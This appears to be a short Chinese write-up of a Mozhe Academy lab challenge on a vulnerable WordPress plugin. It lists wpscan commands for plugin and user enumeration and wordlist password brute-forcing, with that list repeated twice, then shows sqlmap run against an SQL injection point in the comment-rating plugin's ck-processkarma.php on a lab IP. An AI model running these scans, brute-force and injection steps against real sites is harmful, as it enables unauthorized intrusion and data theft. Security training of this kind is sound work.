墨者学院 - WordPress插件漏洞分析溯源
本题提示使用Wpscan扫描wordpress存在的漏洞
地址https://www.jianshu.com/p/a0143cc79215
附上wpscan使用方法
常见语法:
wpscan --url www.target.com --enumerate p #扫描插件基本信息
wpscan --url www.xxx.com --enumerate vp #扫描容易受攻击的插件
wpscan --url www.xxx.com --enumerate ap #扫描所有插件
wpscan --url www.target.com --enumerate u #暴力枚举用户名
wpscan --url www.example.com --wordlist E:\dic\passX.txt --username admin #通过用户名爆破密码
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50 #使用字典调用
wpscan --url www.target.com --enumerate p #扫描插件基本信息
wpscan --url www.xxx.com --enumerate vp #扫描容易受攻击的插件
wpscan --url www.xxx.com --enumerate ap #扫描所有插件
wpscan --url www.target.com --enumerate u #暴力枚举用户名
wpscan --url www.example.com --wordlist E:\dic\passX.txt --username admin #通过用户名爆破密码
wpscan --url www.example.com --wordlist darkc0de.lst --threads 50 #使用字典调用
首先是扫描 wpscan -url http://219.153.49.228:42250 发信漏洞
爆破数据库 wpscan -url http://219.153.49.228:42250 -enumerate u
查看细节发现sql注入漏洞

http://219.153.49.228:42250//wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a
构造sql注入
sqlmap -u "http://219.153.49.228:42250//wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a" --dbs 获取当前数据库

浙公网安备 33010602011771号